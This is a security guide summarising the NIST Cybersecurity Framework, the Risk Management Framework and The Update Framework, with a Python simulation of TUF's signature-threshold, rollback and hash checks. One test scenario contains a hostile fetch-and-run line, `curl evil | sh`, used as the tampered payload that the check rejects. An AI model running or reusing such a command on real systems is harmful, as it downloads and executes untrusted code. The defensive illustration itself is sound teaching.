NIST Security framework#
Whenever you feel the need to draw your own security or risk process: resist the temptation. NIST (the US National Institute of Standards and Technology) is a government agency that publishes freely available, high-quality standards and guidelines on almost every security subject.
One of the simplest, yet most frequently used models is shown below: the core of the NIST Cybersecurity Framework (CSF) with its functions Identify, Protect, Detect, Respond and Recover (CSF 2.0 adds Govern).
On the NIST site (see references) you can find in-depth information on every sub-function of this framework. In practice it is far better to check which of these functions need special attention in your use case than to build something new. If you ever feel the need to create your own security framework, think again: in essence they all come down to the high-level framework NIST describes. Using a widely adopted security framework has a number of advantages:
Easier communication with stakeholders;
Easier knowledge and experience transfer between security experts of different organizations;
Saves time, which you can spend on the real context-specific issues of applying and implementing the security functions.
NIST Risk Management Framework RMF#
The NIST Risk Management Framework (RMF, NIST SP 800-37) provides a comprehensive, flexible, repeatable and measurable seven-step process (Prepare, Categorize, Select, Implement, Assess, Authorize, Monitor) that any organization can use to manage information security and privacy risk for organizations and systems. It links to a suite of NIST standards and guidelines (notably the SP 800-53 control catalog) that support implementing a risk management program meeting the requirements of the Federal Information Security Modernization Act (FISMA).
Risk management overview:
Search for RMF controls (checklist):
Good overview of all controls:
The Update Framework#
The Update Framework (TUF) is a specification and framework for securing software update systems. Its design separates signing responsibilities into roles (root, targets, snapshot, timestamp) with per-role key sets and signature thresholds, and every piece of metadata carries a version and an expiry date. Together these keep clients protected even when the repository or some signing keys are compromised: an attacker holding a single key below the threshold cannot push a malicious update, old but validly signed metadata cannot be replayed, and a file served by a mirror is only accepted if its length and hash match the signed targets metadata. Developers can adopt TUF into any existing software update system.
TUF is a Linux Foundation project hosted under the Cloud Native Computing Foundation (CNCF) and is used in production by various tech companies and open source organizations.
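The checks described above, as an added illustration of the TUF verification model (this is not the python-tuf API or the project's own code, and the snapshot and timestamp roles are left out for brevity). Real TUF signs with asymmetric keys such as Ed25519; this example uses HMAC-SHA256 as a stand-in so it runs with the standard library only, which means the "public" key in root and the signing secret are the same value here. The repository, keys, timestamps and update payload are all constructed for the example.

```python
import hashlib
import hmac
import json

# Constructed "current time" (unix seconds); real clients use the system clock.
NOW = 1_700_000_000
DAY = 86_400


def canonical(signed):
    """TUF signs over canonical JSON so every client hashes the same bytes."""
    return json.dumps(signed, sort_keys=True, separators=(",", ":")).encode()


def make_key(label):
    # Toy key: the secret doubles as the "public" key material stored in root.
    secret = hashlib.sha256(label.encode()).hexdigest()
    return {"keyid": hashlib.sha256(secret.encode()).hexdigest()[:16], "secret": secret}


def sign(key, signed):
    mac = hmac.new(bytes.fromhex(key["secret"]), canonical(signed), hashlib.sha256)
    return {"keyid": key["keyid"], "sig": mac.hexdigest()}


def envelope(signed, keys):
    """A TUF metadata file: the signed body plus one signature per key."""
    return {"signed": signed, "signatures": [sign(k, signed) for k in keys]}


class UpdateRejected(Exception):
    pass


def verify_role(root_signed, role, meta, now=NOW, prev_version=0):
    """Accept `meta` only if enough keys that root delegates to `role` signed it,
    it has not expired, and its version did not go backwards (rollback)."""
    info = root_signed["roles"][role]
    trusted = {k: root_signed["keys"][k] for k in info["keyids"]}
    valid = set()
    for s in meta["signatures"]:
        key = trusted.get(s["keyid"])
        if key is None:
            continue  # signature from an untrusted or revoked key: ignored, not counted
        if hmac.compare_digest(sign(key, meta["signed"])["sig"], s["sig"]):
            valid.add(s["keyid"])
    if len(valid) < info["threshold"]:
        raise UpdateRejected(f"{role}: {len(valid)} valid signature(s), need {info['threshold']}")
    if meta["signed"]["expires"] <= now:
        raise UpdateRejected(f"{role}: metadata expired")
    if meta["signed"]["version"] <= prev_version:
        raise UpdateRejected(f"{role}: version {meta['signed']['version']} is a rollback")
    return meta["signed"]


def verify_target(targets_signed, name, content):
    """Check the downloaded file against the length and hash in signed targets metadata."""
    t = targets_signed["targets"][name]
    if len(content) != t["length"] or hashlib.sha256(content).hexdigest() != t["hashes"]["sha256"]:
        raise UpdateRejected(f"{name}: content does not match signed metadata")
    return True


# Constructed repository: one root key, two targets keys with a threshold of 2.
ROOT_KEY, TARGETS_A, TARGETS_B = make_key("root"), make_key("targets-a"), make_key("targets-b")
ROOT = envelope({
    "_type": "root", "version": 1, "expires": NOW + 365 * DAY,
    "keys": {k["keyid"]: k for k in (ROOT_KEY, TARGETS_A, TARGETS_B)},
    "roles": {
        "root": {"keyids": [ROOT_KEY["keyid"]], "threshold": 1},
        "targets": {"keyids": [TARGETS_A["keyid"], TARGETS_B["keyid"]], "threshold": 2},
    },
}, [ROOT_KEY])
PACKAGE = b"#!/bin/sh\necho 'app v2'\n"  # constructed update payload


def targets_meta(version, content, keys):
    return envelope({
        "_type": "targets", "version": version, "expires": NOW + 7 * DAY,
        "targets": {"app.sh": {"length": len(content),
                               "hashes": {"sha256": hashlib.sha256(content).hexdigest()}}},
    }, keys)


def client_update(targets, content, prev_version=1):
    """Client-side check of a targets file plus payload; returns a verdict string."""
    try:
        root = verify_role(ROOT["signed"], "root", ROOT)  # root is the trust anchor and self-verifies
        signed = verify_role(root, "targets", targets, prev_version=prev_version)
        verify_target(signed, "app.sh", content)
        return "accepted"
    except UpdateRejected as e:
        return f"rejected: {e}"


def scenarios():
    ok = targets_meta(2, PACKAGE, [TARGETS_A, TARGETS_B])
    one_key = targets_meta(2, PACKAGE, [TARGETS_A])              # attacker stole only key A
    rollback = targets_meta(1, PACKAGE, [TARGETS_A, TARGETS_B])  # old, validly signed metadata replayed
    swapped = b"#!/bin/sh\ncurl evil | sh\n"                      # mirror serves a different file
    return {
        "legitimate": client_update(ok, PACKAGE),
        "single_compromised_key": client_update(one_key, PACKAGE),
        "rollback": client_update(rollback, PACKAGE),
        "tampered_target": client_update(ok, swapped),
    }


if __name__ == "__main__":
    for name, verdict in scenarios().items():
        print(f"{name:24s} {verdict}")
```

Only the first scenario is accepted. The second shows why thresholds matter: a repository compromise that yields one targets key still cannot produce an update the client trusts. The third shows the version check catching a replay of old metadata that is otherwise perfectly signed, and the fourth shows that a mirror cannot substitute content because the client checks the downloaded bytes against the hash in the signed targets file rather than trusting the transport.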